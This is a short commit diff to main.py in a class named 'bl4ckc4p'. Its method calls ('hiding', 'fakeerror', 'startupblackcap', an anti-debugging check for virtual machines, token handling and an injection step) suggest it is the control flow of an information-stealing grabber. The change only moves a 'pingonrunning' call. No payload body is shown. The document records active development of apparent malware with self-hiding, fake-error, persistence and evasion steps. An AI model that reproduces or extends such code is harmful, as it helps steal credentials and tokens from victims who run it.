Update main.py

This commit is contained in:
What about KSCH 2023-01-19 22:48:00 +01:00 committed by GitHub
parent 4e1fa00be2
commit 903a7232ba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -462,7 +462,6 @@ class bl4ckc4p(Functions):
self.hiding()
self.fakeerror()
self.pingonrunning()
self.startupblackcap()
if self.fetch_conf('dbugkiller') and AntiDebug().inVM is True:
@ -513,6 +512,7 @@ class bl4ckc4p(Functions):
continue
self.ntfytkn()
await self._1ject()
self.pingonrunning()
self.ending()